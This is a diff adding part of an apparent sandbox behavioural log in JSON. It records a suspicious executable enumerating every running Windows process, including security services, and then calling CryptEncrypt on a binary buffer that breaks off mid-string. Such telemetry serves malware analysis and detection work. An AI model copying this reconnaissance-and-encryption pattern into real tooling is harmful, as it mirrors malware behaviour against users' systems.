+ "repeated": 0, + "id": 2268 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4908" + } + ], + "repeated": 0, + "id": 2269 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4936" + } + ], + "repeated": 0, + "id": 2270 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "StartMenuExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "3508" + } + ], + "repeated": 0, + "id": 2271 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4712" + } + ], + "repeated": 0, + "id": 2272 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5144" + } + ], + "repeated": 0, + "id": 2273 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchApp.exe" + }, + { + "name": "ProcessId", + "value": "5324" + } + ], + "repeated": 0, + "id": 2274 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "5444" + } + ], + "repeated": 0, + "id": 2275 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchIndexer.exe" + }, + { + "name": "ProcessId", + "value": "5456" + } + ], + "repeated": 0, + "id": 2276 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5876" + } + ], + "repeated": 0, + "id": 2277 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smartscreen.exe" + }, + { + "name": "ProcessId", + "value": "6068" + } + ], + "repeated": 0, + "id": 2278 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthSystray.exe" + }, + { + "name": "ProcessId", + "value": "6108" + } + ], + "repeated": 0, + "id": 2279 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthService.exe" + }, + { + "name": "ProcessId", + "value": "5216" + } + ], + "repeated": 0, + "id": 2280 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6468" + } + ], + "repeated": 0, + "id": 2281 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7000" + } + ], + "repeated": 0, + "id": 2282 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ApplicationFrameHost.exe" + }, + { + "name": "ProcessId", + "value": "7132" + } + ], + "repeated": 0, + "id": 2283 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6384" + } + ], + "repeated": 0, + "id": 2284 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7592" + } + ], + "repeated": 0, + "id": 2285 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7620" + } + ], + "repeated": 0, + "id": 2286 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "audiodg.exe" + }, + { + "name": "ProcessId", + "value": "7760" + } + ], + "repeated": 0, + "id": 2287 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ShellExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "7964" + } + ], + "repeated": 0, + "id": 2288 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8048" + } + ], + "repeated": 0, + "id": 2289 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TextInputHost.exe" + }, + { + "name": "ProcessId", + "value": "7716" + } + ], + "repeated": 0, + "id": 2290 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "812" + } + ], + "repeated": 0, + "id": 2291 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WinStore.App.exe" + }, + { + "name": "ProcessId", + "value": "7444" + } + ], + "repeated": 0, + "id": 2292 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4772" + } + ], + "repeated": 0, + "id": 2293 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7408" + } + ], + "repeated": 0, + "id": 2294 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "7736" + } + ], + "repeated": 0, + "id": 2295 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6580" + } + ], + "repeated": 0, + "id": 2296 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6536" + } + ], + "repeated": 0, + "id": 2297 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchProtocolHost.exe" + }, + { + "name": "ProcessId", + "value": "2148" + } + ], + "repeated": 0, + "id": 2298 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dllhost.exe" + }, + { + "name": "ProcessId", + "value": "1592" + } + ], + "repeated": 0, + "id": 2299 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6316" + } + ], + "repeated": 0, + "id": 2300 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SgrmBroker.exe" + }, + { + "name": "ProcessId", + "value": "3540" + } + ], + "repeated": 0, + "id": 2301 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4160" + } + ], + "repeated": 0, + "id": 2302 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6388" + } + ], + "repeated": 0, + "id": 2303 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7140" + } + ], + "repeated": 0, + "id": 2304 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msiexec.exe" + }, + { + "name": "ProcessId", + "value": "6840" + } + ], + "repeated": 0, + "id": 2305 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7556" + } + ], + "repeated": 0, + "id": 2306 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "364" + } + ], + "repeated": 0, + "id": 2307 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "7904" + } + ], + "repeated": 0, + "id": 2308 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1888" + } + ], + "repeated": 0, + "id": 2309 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3788" + } + ], + "repeated": 0, + "id": 2310 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1876" + } + ], + "repeated": 0, + "id": 2311 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pyw.exe" + }, + { + "name": "ProcessId", + "value": "3876" + } + ], + "repeated": 0, + "id": 2312 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pythonw.exe" + }, + { + "name": "ProcessId", + "value": "4696" + } + ], + "repeated": 0, + "id": 2313 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "6080" + } + ], + "repeated": 0, + "id": 2314 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3492" + } + ], + "repeated": 0, + "id": 2315 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TrustedInstaller.exe" + }, + { + "name": "ProcessId", + "value": "4624" + } + ], + "repeated": 0, + "id": 2316 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TiWorker.exe" + }, + { + "name": "ProcessId", + "value": "6300" + } + ], + "repeated": 0, + "id": 2317 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeApp.exe" + }, + { + "name": "ProcessId", + "value": "2636" + } + ], + "repeated": 0, + "id": 2318 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MoUsoCoreWorker.exe" + }, + { + "name": "ProcessId", + "value": "8112" + } + ], + "repeated": 0, + "id": 2319 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7472" + } + ], + "repeated": 0, + "id": 2320 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8936" + } + ], + "repeated": 0, + "id": 2321 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8608" + } + ], + "repeated": 0, + "id": 2322 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8292" + } + ], + "repeated": 0, + "id": 2323 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "7260" + } + ], + "repeated": 0, + "id": 2324 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "3937597df70645ac297e.exe" + }, + { + "name": "ProcessId", + "value": "9436" + } + ], + "repeated": 0, + "id": 2325 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9512" + } + ], + "repeated": 0, + "id": 2326 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "9600" + } + ], + "repeated": 0, + "id": 2327 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "9720" + } + ], + "repeated": 0, + "id": 2328 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "OneDrive.exe" + }, + { + "name": "ProcessId", + "value": "9972" + } + ], + "repeated": 0, + "id": 2329 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeBackgroundHost.exe" + }, + { + "name": "ProcessId", + "value": "7352" + } + ], + "repeated": 0, + "id": 2330 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "7144" + } + ], + "repeated": 0, + "id": 2331 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "5208" + } + ], + "repeated": 0, + "id": 2332 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "9936" + } + ], + "repeated": 0, + "id": 2333 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "VSSVC.exe" + }, + { + "name": "ProcessId", + "value": "9848" + } + ], + "repeated": 0, + "id": 2334 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9892" + } + ], + "repeated": 0, + "id": 2335 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchFilterHost.exe" + }, + { + "name": "ProcessId", + "value": "9956" + } + ], + "repeated": 0, + "id": 2336 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "816" + } + ], + "repeated": 0, + "id": 2337 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2480" + } + ], + "repeated": 0, + "id": 2338 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "8648" + } + ], + "repeated": 0, + "id": 2339 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sppsvc.exe" + }, + { + "name": "ProcessId", + "value": "8868" + } + ], + "repeated": 0, + "id": 2340 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": false, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2341 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3707", + "parentcaller": "0x03ce461b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004ec" + } + ], + "repeated": 0, + "id": 2342 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce2f90", + "parentcaller": "0x03ce14ae", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x052ac000" + }, + { + "name": "RegionSize", + "value": "0x00056000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 2343 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce1bde", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptEncrypt", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "CryptHash", + "value": "0x04e249c0" + }, + { + "name": "Buffer", + "value": "\\x87JT\\xa6\\x16\\x00\\x185\\x97\\xa9n1WH0\\x9e)e\\xc2m/u?\\xfe\\x84\\x9f\\xf5\\xd1}\\xdb\\x9bdd\\x83\\xa6|\\xe4\\xe8\\xe0\\xac\\xdc\\xb3\\xc9\\xe9l\\xb9\\xbe\n\\xb39\\xd5\\x17\\xe1\\x9c\\x9di\\x8e\\x08\\xdc\\xc2U?\\xceP\\xde\\xfc\\xf9\\x8b\\x0e\\x17\\xcb \\xbf\\x10}\\xa2\\x85\\x0eMisF\\x08\\\\xfc\\xacO\\xe0\\xb4p-]\\x1d\\x11\\xe3\\xbfl\\x9f\\x18\\x8b\\x9e\\xd0\\xd9 o0\\xa2\\xab.\\xc3\\xad\\x16\\x97\\x87\\x0f\\xf1\\xe4\\xc0>\\x97$\\xf2\\xd1p\\xd9Fk\\xa6\\xd6\\x87\\xd2\\xdb\\x1c\\xf3_\\xc99\\xf4\\xa86\\xaey\\x19T\r\\xab\\xbf\\xfb\\xe6\\x17\\x90\\x12P\\x7fn\\xc7\rE|\\xb7\\xb8uV\\xd3\\xabt\\x0bV&\\xa8\\x7f\\xa9m\\xd4\\xca\\xa3\\xc0\\xdd\\xbb}F\\xafN\\x01\\xe2D\\xd6\\x13: 